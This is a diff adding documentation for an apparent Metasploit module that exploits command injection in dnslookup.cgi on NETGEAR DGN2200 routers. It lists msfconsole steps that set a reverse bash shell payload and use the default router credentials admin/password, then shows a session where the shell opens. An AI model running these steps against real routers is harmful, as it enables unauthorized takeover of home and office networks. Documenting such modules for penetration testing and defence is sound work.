|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | + NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers |
| 4 | + |
| 5 | +## Verification Steps |
| 6 | + |
| 7 | + 1. start `msfconsole` |
| 8 | + 2. `use exploit/linux/http/netger_dnslookup_cmd_exec` |
| 9 | + 3. `set RHOST 192.168.1.1` `<--- Router IP` |
| 10 | + 4. `set USERNAME xxxx` (see [here]()) |
| 11 | + 5. `set PASSWORD xxxx` (see [here]()) |
| 12 | + 5. `set PAYLOAD cmd/unix/reverse_bash` |
| 13 | + 6. `set LHOST 192.168.1.x` |
| 14 | + 7. `set LPORT xxxx` |
| 15 | + 8. `run` |
| 16 | + 9. Get a session |
| 17 | + |
| 18 | +## Options |
| 19 | + |
| 20 | + **USERNAME** |
| 21 | + |
| 22 | + The `USERNAME` option sets the username to authenticate the request with. |
| 23 | + The command injection will __not__ succeed if the username and password are not correct. |
| 24 | + The default username for NETGEAR Routers is `admin`. If you don't know the credentials, |
| 25 | + your best bet will be to use the default username and password. |
| 26 | + |
| 27 | + |
| 28 | + **PASSWORD** |
| 29 | + |
| 30 | + The `PASSWORD`options sets the password to authenticate the request with. |
| 31 | + The command injection will __not__ succeed if the username and password are not correct. |
| 32 | + The default password for NETGEAR Routers is `password`. If you don't know the credentials, |
| 33 | + your best bet will be to use the default username and password. |
| 34 | + |
| 35 | +## Advanced Options |
| 36 | + |
| 37 | + **HOSTNAME** |
| 38 | + |
| 39 | + The request is went with a `host_name` POST parameter. This option sets this parameter. |
| 40 | + The default is `www.google.com`. The reason for the parameter is that the file that this |
| 41 | + vulnerability is located in (`dnslookup.cgi`) actually needs a domain to resolve, or else |
| 42 | + the injection won't work. |
| 43 | + |
| 44 | + |
| 45 | +## Scenarios |
| 46 | + |
| 47 | + What it should look like against a vulnerable router. |
| 48 | + |
| 49 | + ``` |
| 50 | +msf > use exploit/linux/http/netgear_dnslookup_cmd_exec |
| 51 | +msf exploit(netgear_dnslookup_cmd_exec) > options |
| 52 | +
|
| 53 | +Module options (exploit/linux/http/netgear_dnslookup_cmd_exec): |
| 54 | +
|
| 55 | + Name Current Setting Required Description |
| 56 | + ---- --------------- -------- ----------- |
| 57 | + PASSWORD yes Password to authenticate with |
| 58 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...] |
| 59 | + RHOST yes The target address |
| 60 | + RPORT 80 yes The target port (TCP) |
| 61 | + SSL false no Negotiate SSL/TLS for outgoing connections |
| 62 | + USERNAME yes Username to authenticate with |
| 63 | + VHOST no HTTP server virtual host |
| 64 | +
|
| 65 | +
|
| 66 | +Exploit target: |
| 67 | +
|
| 68 | + Id Name |
| 69 | + -- ---- |
| 70 | + 0 NETGEAR DDGN2200 Router |
| 71 | +
|
| 72 | +
|
| 73 | +msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1 |
| 74 | +RHOST => 192.168.1.1 |
| 75 | +msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin |
| 76 | +USERNAME => admin |
| 77 | +msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password |
| 78 | +PASSWORD => password |
| 79 | +msf exploit(netgear_dnslookup_cmd_exec) > run |
| 80 | +
|
| 81 | +[*] Started reverse TCP double handler on 192.168.1.9:4444 |
| 82 | +[+] Router is a NETGEAR router (DGN2200v1) |
| 83 | +[*] Sending payload... |
| 84 | +[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500 |
| 85 | +``` |
| 86 | + |
0 commit comments